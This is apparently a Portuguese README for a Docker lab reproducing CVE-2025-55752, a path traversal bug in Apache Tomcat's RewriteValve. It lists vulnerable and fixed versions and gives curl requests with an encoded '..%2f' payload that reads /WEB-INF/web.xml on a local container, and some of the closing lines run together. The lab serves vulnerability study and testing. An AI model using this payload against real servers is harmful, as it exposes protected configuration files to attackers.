
# Ambiente de reprodução baseado em Docker para CVE-2025-55752, uma vulnerabilidade de path traversal no RewriteValve do Apache Tomcat, demonstrando a falha de normalização antes da decodificação e fornecendo comandos de teste.
Ambiente de reprodução baseado em Docker para CVE-2025-55752, uma vulnerabilidade de path traversal no Apache Tomcat 10.1.44.
CVE-2025-55752 é uma vulnerabilidade de path traversal no RewriteValve do Apache Tomcat causada pelo processamento incorreto
da ordem: a normalização de URL ocorre antes da decodificação de URL. Isso permite que atacantes contornem restrições de segurança
que protegem diretórios como /WEB-INF/ usando sequências de path traversal codificadas em URL (..%2f).
| Série | Versões Vulneráveis | Versão Corrigida |
|---|
| 11.x | 11.0.0-M1 a 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 a 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 a 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 a 8.5.100 | EOL - Sem correção |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Esperado: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Esperado: 200 OK + conteúdo do web.xml (vulnerabilidade confirmada)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f não é reconhecido como /, .. sobrevive%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlCorreto: Decodificar → Normalizar → Verificação de Segurança
Vulnerável: Normalizar → Decodificar → Verificação de Segurança ✗
../ e %2e%2e⚠️ AVISO: Não implante em produção. Use apenas em ambientes de teste isolados.